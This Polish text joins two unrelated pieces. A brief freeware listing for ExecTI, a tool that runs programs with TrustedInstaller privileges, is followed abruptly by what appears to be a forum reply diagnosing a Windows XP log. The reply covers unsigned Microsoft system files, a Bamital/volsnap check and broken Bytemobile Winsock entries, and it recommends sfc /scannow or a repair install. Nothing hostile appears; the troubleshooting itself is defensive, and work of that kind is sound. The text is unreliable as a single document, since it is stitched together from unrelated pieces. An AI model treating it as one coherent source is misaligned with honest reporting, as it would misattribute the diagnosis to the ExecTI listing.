ExecTI Strona domowa Platforma: Windows 7 i nowsze 32-bit i 64-bit Licencja: freeware Miniaturowa aplikacja do uruchamiania plików wykonywalnych (exe, cmd, bat) na uprawnieniu TrustedInstaller. Interfejs zgrzebny, brak dodatkowych dialogów i opcji. Operacja ogranicza się do wyboru pliku wykonywalnego via przycisk "Browse..." lub poprzez bezpośrednie wpisanie komendy w polu tekstowym. Obsługiwane wprowadzanie poleceń z argumentami. Np. wpisując regedit.exe -m uruchomimy nową instancję edytora rejestru. W pliku ExecTI.ini są zapamiętywane ostatnio używane ścieżki.

Jest tu kilka uszkodzeń: 1. Po pierwsze, masa plików Microsoftu nie ma podpisu cyfrowego, w tym pliki powiązane z działaniem sieci: ==================== Bamital & volsnap ====================== C:\WINDOWS\system32\services.exe [2008-04-15 14:00] - [2009-02-09 13:25] - 0111104 _____ (Microsoft Corporation) 02A467E27AF55F7064C5B251E587315F C:\WINDOWS\system32\rpcss.dll [2008-04-15 14:00] - [2009-02-09 12:53] - 0401408 _____ (Microsoft Corporation) A37311D9D628C1042A2836731787F0F3 C:\WINDOWS\system32\dnsapi.dll [2008-04-15 14:00] - [2011-03-03 08:55] - 0149504 _____ (Microsoft Corporation) 6599CFCB40329C37282E4E80E813E799 ==================== Usługi (filtrowane) ==================== S4 Browser; C:\WINDOWS\System32\browser.dll [78336 2012-07-06] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [45568 2009-04-20] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Eventlog; C:\WINDOWS\system32\services.exe [111104 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 EventSystem; C:\WINDOWS\system32\es.dll [253952 2008-07-07] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 FastUserSwitchingCompatibility; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 LanmanServer; C:\WINDOWS\System32\srvsvc.dll [99840 2010-08-27] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 lanmanworkstation; C:\WINDOWS\System32\wkssvc.dll [132096 2009-06-10] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 Nla; C:\WINDOWS\System32\mswsock.dll [246784 2008-06-20] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 PlugPlay; C:\WINDOWS\system32\services.exe [111104 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [58880 2010-08-17] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Themes; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] ===================== Sterowniki (filtrowane) ====================== R1 AFD; C:\WINDOWS\System32\drivers\afd.sys [138496 2011-08-17] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 HTTP; C:\WINDOWS\System32\Drivers\HTTP.sys [265728 2009-10-20] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 hwusbapp; C:\WINDOWS\System32\DRIVERS\ewusbapp.sys [65152 2006-05-31] (QUALCOMM Incorporated) [Brak podpisu cyfrowego] S3 hwusbser; C:\WINDOWS\System32\DRIVERS\ewusbser.sys [65152 2006-05-31] (QUALCOMM Incorporated) [Brak podpisu cyfrowego] R0 KSecDD; C:\WINDOWS\system32\Drivers\KSecDD.sys [92928 2009-06-24] (Microsoft Corporation) [Brak podpisu cyfrowego] R1 MRxSmb; C:\WINDOWS\System32\DRIVERS\mrxsmb.sys [456320 2011-07-15] (Microsoft Corporation) [Brak podpisu cyfrowego] R0 Mup; C:\WINDOWS\system32\Drivers\Mup.sys [105472 2011-04-21] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [10496 2011-07-08] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 NDProxy; C:\WINDOWS\system32\Drivers\NDProxy.sys [40960 2013-11-27] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 Srv; C:\WINDOWS\System32\DRIVERS\srv.sys [357888 2011-02-17] (Microsoft Corporation) [Brak podpisu cyfrowego] R1 Tcpip; C:\WINDOWS\System32\DRIVERS\tcpip.sys [361600 2008-06-20] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 UIUSys; C:\WINDOWS\System32\DRIVERS\UIUSYS.SYS [6909 2006-06-09] (Conexant Systems, Inc) [Brak podpisu cyfrowego] S3 usbccgp; C:\WINDOWS\System32\DRIVERS\usbccgp.sys [32384 2013-08-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 usbehci; C:\WINDOWS\System32\DRIVERS\usbehci.sys [30336 2009-03-18] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 usbscan; C:\WINDOWS\System32\DRIVERS\usbscan.sys [14976 2013-07-03] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 usb_rndisx; C:\WINDOWS\System32\DRIVERS\usb8023x.sys [12928 2013-02-12] (Microsoft Corporation) [Brak podpisu cyfrowego] Ten odczyt może oznaczać uszkodzenie plików lub uszkodzenie bazy podpisów cyfrowych (Catroot lub Catroot2). 2. Po drugie, uszkodzony Winsock (brak pliku Bytemobile). Winsock: Catalog9 01 bmnet.dll => Brak pliku Winsock: Catalog9 02 bmnet.dll => Brak pliku Winsock: Catalog9 03 bmnet.dll => Brak pliku Wpisy mogą być nadal pomimo resetu Winsock ponieważ procesy Bytemobile są aktywne i mogą przywracać te wejścia. O ile Winsock można próbować reperować poprzez przeinstalowanie Bytemobile, to większy problem jest tu z plikami Microsoftu. Przy założeniu, że to pliki per se są uszkodzone a nie Catroot2, naprawa ręczna zdaje się tu być nieopłacalna - musi być uruchomiony ogólny system sprawdzania i podstawiania plików MS, czyli albo sfc /scannow (na XP jest to słaby system) albo reperacja nakładkowa systemu. Za bazę naprawczą muszą być wzięte pliki z SP3, by zachować podstawową zgodność. Te procesy i tak wyzerują aktualizacje nowsze niż SP3.